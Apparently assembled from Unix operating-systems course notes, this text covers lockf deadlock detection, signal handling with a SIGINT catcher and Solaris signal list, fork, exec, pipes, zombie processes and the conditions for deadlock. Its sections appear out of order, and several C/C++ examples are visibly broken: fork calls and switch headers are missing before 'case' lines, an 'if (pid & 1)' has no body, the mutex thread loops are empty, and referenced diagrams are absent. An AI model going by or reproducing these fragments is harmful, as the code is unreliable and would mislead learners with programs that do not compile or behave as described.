The Unix file locking system lockf has a deadlock detection mechanism built into it. Whenever a process attempts to lock a file or a record of a file, the operating system checks to see if that process has locked other files or records, and if it has, it uses a graph algorithm similar to the one discussed above to see if granting that request will cause deadlock, and if it does, the request for the lock will fail, and the lockf system call will return and errno will be set to EDEADLK.


Recall that an interrupt is an asynchronous event which can happen at any time. When an interrupt occurs, the processor stops executing instructions in the current running process and executes an interrupt handler function in the kernel. Unix systems have a software interrupt mechanism called signals.
An example of a signal that you are probably familiar with is an interrupt signal which is sent by the user to a running process when the user enters Control-C. The default action of this signal is to kill the process.
A signal is represented as an integer. These integers are assigned symbolic names in the header file signal.h. The interrupt signal has the value 2 but you should use the symbolic name SIGINT.
Every signal has a default action. The default action for SIGINT is to abort the program. A program can modify the default action for most signals or they can choose to ignore a signal.
The system call which does this has the following function prototype.
void (*signal (int sig, void (*disp)(int)))(int);
This says that the function signal takes two arguments, the first, sig is a signal, and the second is function name. This function takes one argument, an integer and returns a pointer. The call to signal changes the signal handling function for its first argument from the default to the function of its second argument.
Here is a simple example.

#include <signal.h> #include <stdio.h> void *SigCatcher(int n) { printf("Ha Ha, you can't kill me\n"); signal(SIGINT,(void (*))SigCatcher); return (void *)NULL; } int main() { int i; signal(SIGINT,(void (*))SigCatcher); for (i=0;i<10;i++) { sleep(1); printf("Just woke up, i is %d\n",i); } return 0; } The main function calls signal to change the default action to the function SigCatcher then enters a loop where it alternately sleeps for one second, then displays a message on stdout. Normally, the user could kill this program by hitting Control-C while it was running, but because the default signal action has changed, when the user hits Control-C while this program is running, instead of the program dying, it displays the message
Ha Ha, you can't kill me
Try it. Notice that the signal handler function calls signal. On some Unix systems, once a signal handler has been called, the system resets the handler to the default unless it is reset again.
Here is a list of the predefined signals on Solaris (there are some slight differences from one Unix system to another).
#define SIGHUP 1 /* hangup */ #define SIGINT 2 /* interrupt (rubout) */ #define SIGQUIT 3 /* quit (ASCII FS) */ #define SIGILL 4 /* illegal instruction (not reset when caught) */ #define SIGTRAP 5 /* trace trap (not reset when caught) */ #define SIGIOT 6 /* IOT instruction */ #define SIGABRT 6 /* used by abort, replace SIGIOT in the future */ #define SIGEMT 7 /* EMT instruction */ #define SIGFPE 8 /* floating point exception */ #define SIGKILL 9 /* kill (cannot be caught or ignored) */ #define SIGBUS 10 /* bus error */ #define SIGSEGV 11 /* segmentation violation */ #define SIGSYS 12 /* bad argument to system call */ #define SIGPIPE 13 /* write on a pipe with no one to read it */ #define SIGALRM 14 /* alarm clock */ #define SIGTERM 15 /* software termination signal from kill */ #define SIGUSR1 16 /* user defined signal 1 */ #define SIGUSR2 17 /* user defined signal 2 */ #define SIGCLD 18 /* child status change */ #define SIGCHLD 18 /* child status change alias (POSIX) */ #define SIGPWR 19 /* power-fail restart */ #define SIGWINCH 20 /* window size change */ #define SIGURG 21 /* urgent socket condition */ #define SIGPOLL 22 /* pollable event occured */ #define SIGIO SIGPOLL /* socket I/O possible (SIGPOLL alias) */ #define SIGSTOP 23 /* stop (cannot be caught or ignored) */ #define SIGTSTP 24 /* user stop requested from tty */ #define SIGCONT 25 /* stopped process has been continued */ #define SIGTTIN 26 /* background tty read attempted */ #define SIGTTOU 27 /* background tty write attempted */ #define SIGVTALRM 28 /* virtual timer expired */ #define SIGPROF 29 /* profiling timer expired */ #define SIGXCPU 30 /* exceeded cpu limit */ #define SIGXFSZ 31 /* exceeded file size limit */ #define SIGWAITING 32 /* process's lwps are blocked */ #define SIGLWP 33 /* special signal used by thread library */ #define SIGFREEZE 34 /* special signal used by CPR */ #define SIGTHAW 35 /* special signal used by CPR */ #define SIGCANCEL 36 /* thread cancellation signal used by libthread */ #define SIGLOST 37 /* resource lost (eg, record-lock lost) */ Signal 11, SIGSEGV is the signal that is received when the program detects a segmentation fault (memory exception error). The default action for this is to display the message
Segmentation Fault (core dumped)
dump the core, and terminate the program. You can change the action for this so that it displays a different message, but of course you cannot try to continue to run the program.
Signal 9, SIGKILL, is the kill signal. A program is not allowed to change the signal handler for this signal. Otherwise, it would be possible for a program to change all of its signal handlers so that no one could kill a rogue program. To send a kill signal from the shell to a particular process, enter
kill -9 ProcessNumber

Signal 14 SIGALRM sends an alarm to a process. The default SIGALRM handler is to abort the program, but this can be changed. The system call
unsigned int alarm(unsigned int sec);
sends a SIGALRM signal to the process after sec seconds. If you have changed the signal handler function for this, then you can arrange for an event to happen after a set period of time.
You can choose to ignore any signal (except SIGKILL) by using SIG_IGN as the second argument of signal. You can also reset the signal handler for a particular signal to its default by using SIG_DFL as the second argument to signal.

Fork and Exec

The fork system call in Unix creates a new process. The new process inherits various properties from its parent (Environmental variables, File descriptors, etc - see the manual page for details). After a successful fork call, two copies of the original code will be running. In the original process (the parent) the return value of fork will be the process ID of the child. In the new child process the return value of fork will be 0. Here's a simple example where the child sleeps for 2 seconds while the parent waits for the child process to exit. Note how the return value of fork is used to control which code is run by the parent and which by the child.
#include <unistd.h>
#include <sys/wait.h>
#include <iostream>
using namespace std;
int main(){
  pid_t pid;
  int status, died;
     case -1: cout << "can't fork\n";
     case 0 : sleep(2); // this is the code the child runs
     default: died= wait(&status); // this is the code the parent runs 
In the following annotated example the parent process queries the child process in more detail, determining whether the child exited normally or not. To make things interesting the parent kills the child process if the latter's PID is odd, so if you run the program a few times expect behaviour to vary.
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <iostream>
using namespace std;

int main(){
   pid_t pid;
   int status, died;
   case -1: cout << "can't fork\n";
   case 0 : cout << "   I'm the child of PID " << getppid() << ".\n";
            cout << "   My PID is " <<  getpid() << endl;
   default: cout << "I'm the parent.\n";
            cout << "My PID is " <<  getpid() << endl;
            // kill the child in 50% of runs
            if (pid & 1)
            died= wait(&status);
               cout << "The child, pid=" << pid << ", has returned " 
                    << WEXITSTATUS(status) << endl;
         cout << "The child process was sent a " 
                    << WTERMSIG(status) << " signal\n";
In the examples above, the new process is running the same program as the parent (though it's running different parts of it). Often however, you want the new process to run a new program. When, for example, you type "date" on the unix command line, the command line interpreter (the so-called "shell") forks so that momentarily 2 shells are running, then the code in the child process is replaced by the code of the "date" program by using one of the family of exec system calls. Here's a simple example of how it's done.
#include <unistd.h>
#include <sys/wait.h>
#include <iostream>
using namespace std;

int main(){
   pid_t pid;
   int status, died;
   case -1: cout << "can't fork\n";
   case 0 : execl("/usr/bin/date","date",0); // this is the code the child runs 
   default: died= wait(&status); // this is the code the parent runs
The child process can communicate some information to its parent via the argument to exit, but this is rather restrictive. Richer communication is possible if one takes advantage of the fact that the child and parent share file descriptors. The popen() command is the tidiest way to do this. The following code uses a more low-level method. The pipe() command creates a pipe, returning two file descriptors; the 1st opened for reading from the pipe and the 2nd opened for writing to it. Both the parent and child process initially have access to both ends of the pipe. The code below closes the ends it doesn't need.
#include <unistd.h>
#include <sys/wait.h>
#include <iostream>
#include <sys/types.h>
using namespace std;
int main(){
 char str[1024], *cp;
 int pipefd[2];
 pid_t pid;
 int status, died;

  pipe (pipefd);
   case -1: cout << "can't fork\n";
   case 0 : // this is the code the child runs 
            close(1);      // close stdout
            // pipefd[1] is for writing to the pipe. We want the output
            // that used to go to the standard output (file descriptor 1)
            // to be written to the pipe. The following command does this,
            // creating a new file descripter 1 (the lowest available) 
            // that writes where pipefd[1] goes.
            dup (pipefd[1]); // points pipefd at file descriptor
            // the child isn't going to read from the pipe, so
            // pipefd[0] can be closed
            close (pipefd[0]);
            execl ("/usr/bin/date","date",0);
   default: // this is the code the parent runs 

            close(0); // close stdin
            // Set file descriptor 0 (stdin) to read from the pipe
            dup (pipefd[0]);
            // the parent isn't going to write to the pipe
            close (pipefd[1]);
            // Now read from the pipe
            cin.getline(str, 1023);
            cout << "The date is " << str << endl;
            died= wait(&status);
In all these examples the parent process waits for the child to exit. If the parent doesn't wait, but exits before the child process does, then the child is adopted by another process (usually the one with PID 1). After the child exits (but before it's waited for) it becomes a "zombie". If it's never waited for (because the parent process is hung, for example) it remains a zombie. In more recent Unix versions, the kernel releases these processes, but sometimes they can only be removed from the list of processes by rebooting the machine. Though in small numbers they're harmless enough, avoiding them is a very good idea. Particularly if a process has many children, it's worth using waitpid() rather than wait(), so that the code waits for the right process. Some versions of Unix have wait2(), wait3() and wait4() variants which may be useful.

Double fork

One way to create a new process that is more isolated from the parent is to do the following [double fork]
The original process doesn't have to wait around for the new process to die, and doesn't need to worry when it does.


Recall that one definition of an operating system is a resource allocator. There are many resources that can be allocated to only one process at a time, and we have seen several operating system features that allow this, such as mutexes, semaphores or file locks.
Sometimes a process has to reserve more than one resource. For example, a process which copies files from one tape to another generally requires two tape drives. A process which deals with databases may need to lock multiple records in a database.
In general, resources allocated to a process are not preemptable; this means that once a resource has been allocated to a process, there is no simple mechanism by which the system can take the resource back from the process unless the process voluntarily gives it up or the system administrator kills the process. This can lead to a situation called deadlock. A set of processes or threads is deadlocked when each process or thread is waiting for a resource to be freed which is controlled by another process. Here is an example of a situation where deadlock can occur.
Mutex M1, M2;

/* Thread 1 */
while (1) {

/* Thread 2 */
while (1) {
Suppose thread 1 is running and locks M1, but before it can lock M2, it is interrupted. Thread 2 starts running; it locks M2, when it tries to obtain and lock M1, it is blocked because M1 is already locked (by thread 1). Eventually thread 1 starts running again, and it tries to obtain and lock M2, but it is blocked because M2 is already locked by thread 2. Both threads are blocked; each is waiting for an event which will never occur. Traffic gridlock is an everyday example of a deadlock situation.

In order for deadlock to occur, four conditions must be true.
  • Mutual exclusion - Each resource is either currently allocated to exactly one process or it is available. (Two processes cannot simultaneously control the same resource or be in their critical section).
  • Hold and Wait - processes currently holding resources can request new resources
  • No preemption - Once a process holds a resource, it cannot be taken away by another process or the kernel.
  • Circular wait - Each process is waiting to obtain a resource which is held by another process.
The dining philosophers problem discussed in an earlier section is a classic example of deadlock. Each philosopher picks up his or her left fork and waits for the right fork to become available, but it never does.
Deadlock can be modeled with a directed graph. In a deadlock graph, vertices represent either processes (circles) or resources (squares). A process which has acquired a resource is show with an arrow (edge) from the resource to the process. A process which has requested a resource which has not yet been assigned to it is modeled with an arrow from the process to the resource. If these create a cycle, there is deadlock.
The deadlock situation in the above code can be modeled like this.

This graph shows an extremely simple deadlock situation, but it is also possible for a more complex situation to create deadlock. Here is an example of deadlock with four processes and four resources.

There are a number of ways that deadlock can occur in an operating situation. We have seen some examples, here are two more.
  • Two processes need to lock two files, the first process locks one file the second process locks the other, and each waits for the other to free up the locked file.
  • Two processes want to write a file to a print spool area at the same time and both start writing. However, the print spool area is of fixed size, and it fills up before either process finishes writing its file, so both wait for more space to become available.